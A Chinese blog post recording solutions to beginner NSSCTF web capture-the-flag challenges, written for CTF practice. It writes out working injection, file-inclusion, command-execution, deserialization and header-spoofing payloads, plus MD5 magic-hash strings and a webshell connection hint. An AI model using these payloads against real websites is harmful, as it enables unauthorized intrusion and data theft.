NSSCTFweb刷题记录

已于 2023-07-28 15:37:04 修改
阅读量321 收藏 1
点赞数
分类专栏: CTFweb刷题记录 文章标签: java 服务器 前端
于 2023-07-12 17:32:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fivesheeptree/article/details/131685871
版权

目录

[SWPUCTF 2021 新生赛]jicao

 [SWPUCTF 2021 新生赛]easy_md5

 [SWPUCTF 2021 新生赛]easy_sql

[SWPUCTF 2021 新生赛]include 

[SWPUCTF 2021 新生赛]easyrce 

[SWPUCTF 2021 新生赛]caidao

[第五空间 2021]WebFTP

 [SWPUCTF 2021 新生赛]babyrce

[SWPUCTF 2021 新生赛]Do_you_know_http

 [SWPUCTF 2021 新生赛]ez_unserialize

[SWPUCTF 2021 新生赛]jicao

如果$id等于"wllmNB"并且$json['x']等于"wllm",则将输出$flag的值。

json参数的值解码为{"x":"wllm"},从而使得$json['x']的值等于"wllm"。

通过POST方法传递的id参数的值,并将通过GET方法传递的json参数解码为关联数组

 [SWPUCTF 2021 新生赛]easy_md5

可以传MD5值为0e开头的两个不同字符串绕过,也可以传递数组绕过

https://www.cnblogs.com/dre0m1/p/16062369.html

第一种传入数组绕过构造name[]=1和password[]=2

第二种传MD5值为0e开头的两个不同字符串绕过

以下是$name != $password && md5($name) == md5($password)MD5相匹配的值 

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a

 [SWPUCTF 2021 新生赛]easy_sql

SQL注入基础语句大全

https://blog.csdn.net/Jack0610/article/details/88056137https://blog.csdn.net/Jack0610/article/details/88056137

注入wllm=1'的时候出现报错,判断为字符型漏洞

查看一下字段列数,正常

?wllm=-1' order by 3--+

?wllm=-1' order by 4--+

出现报错,则为3列.

?wllm=-1' union select 1,2,3--+

查看回显

查看数据库名

?wllm=-1' union select 1,2,database()--+

 ?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+

查看test_tb库的表

查字段

?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+ 

 

出现flag,查看flag内容

-1' union select 1,2,group_concat(id,flag) from test_tb--+ ​​​​​​​ 

[SWPUCTF 2021 新生赛]include 

PHP Filter伪协议Trick总结

先传入一个file=1,需要获取file参数则输出flag.php

构造filter伪协议,得到flag 

file=php://filter/read=convert.base64-encode/resource=flag.php

base64解码

[SWPUCTF 2021 新生赛]easyrce 

eval执行: PHP代码显示,要求将命令赋值给url然后执行

先查看一下根目录文件

url=system("ls")


url=system("ls /")

查看flllllaaaaaaggggggg文件

url=system("cat /flllllaaaaaaggggggg")

 cat /是查看根目录,cat flag是查看当前目录下面的flag 

[SWPUCTF 2021 新生赛]caidao

提示存在执行漏洞,post传入

wllm=echo `cat /flag`;

或者蚁剑连接,密码就是wllm

flag在根目录里面

[第五空间 2021]WebFTP

找到管理员账号密码(感觉并没有什么用)

 

在url后面直接加上phpinfo.php,直接找到flag

 [SWPUCTF 2021 新生赛]babyrce

审计代码,设置cookie为admin=1则得到../next.php

访问rasalghul.php

构造

url=ls${IFS}/

?url=cat${IFS}/flllllaaaaaaggggggg

 

[SWPUCTF 2021 新生赛]Do_you_know_http

将User-Agent修改为WLLM

提示使用本地登录

加一句IP请求头

x-forwarded-for:127.0.0.1

 访问secretttt.php,得到flag

 [SWPUCTF 2021 新生赛]ez_unserialize

提示查看robot.txt文件

访问/c145s.php,得到源码,如果admin=admin,passwd=ctf则得到flag.php

 构造反序列化漏洞:反序列化漏洞

p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

O:4:"wllm":2: 表示这是一个类为 "wllm" 的对象,其中 "wllm" 类名的长度为 4。 s:5:"admin"; 表示键名为 "admin" 的字符串,长度为 5,对应的值是 "admin"。 s:6:"passwd"; 表示键名为 "passwd" 的字符串,长度为 6,对应的值是 "ctf"

 得到flag

fivesheeptree
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[SWPUCTF 2021 新生]caidao
rev1ve的博客
03-05 1015
[SWPUCTF 2021 新生]caidao
2024年网络安全最新[SWPU CTF]之Misc篇(NSSCTF刷题记录⑥_nssctfmisc(2)
最新发布
05-03 1042
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
NSSCTF web记录
m0_64815693的博客
11-08 9698
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生]babyunser [TQLCTF 2022]simple_bypass
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1024
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload。
NSSCTF——Web题目1
weixin_54055099的博客
08-25 1099
NSSCTF基础web题目的解题思路
NSSCTF刷题记录
kindyyy的博客
03-13 754
NSSctf刷题记录,有错误欢迎指正
NSSCTF之Misc篇刷题记录
Aluxian_的博客
05-11 1836
[GKCTF 2021]签到 [NISACTF 2022]bmpnumber [领航杯江苏省 2021]签到题 [鹤城杯 2021]Misc2 [鹤城杯 2021]A_MISC [GXYCTF 2019]CheckIn [HDCTF 2023]hardMisc [NSSRound#1 Basic]cut_into_thirds [闽盾杯 2021]Modbus的秘密 [NISACTF 2022]神秘数字 [INSHack 2019]INSAnity [UTCTF 2020]Basics(MISC)
NSSCTF做题
wwwwyyyrre的博客
09-24 580
打开题目 发现是登录的界面 用admin和password试一下发现不行用dirsearch扫一下发现了git泄露 但是用githack下载不下来文件 去网上查了一下webftp 发现是一个在线php文件管理系统在这篇博客中提到,引用一下发现能直接登录phpinfo.php 拿到flag。
[SWPU CTF]之Misc篇(NSSCTF刷题记录
Aluxian_的博客
05-01 1930
第十二张图: 新闻联播 一般我晚上 7点或者19.00。第一张图:20%和80% 猜测可能是 28或82。第三张图:而立之年 30而立嘛 肯是30。第二张图:一张八卦图 猜测是08。第六张图:飞机歼-20 20。第七张图:两只黄鹂鸣翠柳 02。第八张图:一起去看流星雨 17。第四张图:北斗七星图 07。第五张图:江南四大才子 04。第十一张图:12星座 12。第十张图:一马当先 01。第九张图:乔丹 23。
NSSCTF刷题笔记web6——[SWPUCTF 2021 新生]caidao
qq_45692883的博客
01-18 510
题目也是非常的简洁明了,考点可能是菜刀的使用,所以稍微绕一下,用菜刀来get shell。直接输入网址以及密码和脚本格式,就可以获取shell。caidao是一款shell管理工具。
一些简单的NSSCTFweb wp(SPWU篇)
2303_79513877的博客
03-17 699
另:若遇到===这样的强类型比较,方法一就失效了,方法二仍然有效,或者还可以使用软件fastcoll进行md5碰撞,生成两个字符串使得他们的md5值相同。方法一: 可以使用带0e开头的数字穿进行传递参数,因为php会将0e开头的数字转化为0,故此时md5值相等,而两个变量值不相等;方法二: 可以传递数组,如name[]=123,password[]=456,md5不能加密数组,故两个md5返回的都是null。由题查看根目录下文件,查看f…可以发现此时判断md5值是否一样用的是==,这是php的弱类型比较,
NSSCTF (3)
qq_61988806的博客
05-11 541
我们打开js源码很明显这里当score大于60会出flag我们寻找到了getScore方法所在的地方之后发现他存在于Snake.prototype中再控制台中给getScore赋值再空格页面。
BUUCTF WEB(12月刷题~)
A_dmin的博客
01-21 1938
BUUCTF WEB [RoarCTF 2019]Easy Java BUUCTF WEB [0CTF 2016]piapiapia BUUCTF WEB [CISCN2019 华北区 Day1 Web1]Dropbox BUUCTF WEB [CISCN2019 华北区 Day1 Web2]ikun BUUCTF WEB [BUUCTF 2018]Online Tool BUUCTF WEB [ZJCTF 2019]NiZhuanSiWei BUUCTF WEB shrine
小白刷题CTF show web方向
strawberry47的博客
03-12 423
CTF show做题笔记
[SWPUCTF 2021 新生] web
qq_61768489的博客
08-07 3514
简单来说: 检测路径中是否存在%字符,并且如果%后面的两个字符是十六进制字符,就会对后面的两个字符进行url解码转化,如路径中有%2e./,则会解码为../,转换后判断是否存在../,加入路径中使用.%2e/则能绕过,导致目录穿越漏洞,因为当遍历到第一个.时,后面两个字符是%2并不是./,就不会被处理,绕过检测。没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。...
CTF刷题-汇总
热门推荐
~airrudder~
04-09 1万+
BUUCTF平台的刷题之旅 Web
CTFShow web入门题刷题记录
打酱油的杯具的博客
11-15 1411
CTFShow web入门题刷题记录(信息搜集) web1 提示:开发注释未及时删除 打开网页查看源代码发现 flag:flag{2b2cf8e3-f880-41e1-a8ff-02601b3d998f} web2 提示:js前台拦截 === 无效操作 打开连接发现无法右键,f12,使用浏览器自带的工具查看(火狐:crtl+u)或者地址前加上view-source: flag:flag{18c9c586-99d5-47b8-8dcc-e404086c3a54} web3 提示:没思路的时候抓个包看看,可能

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值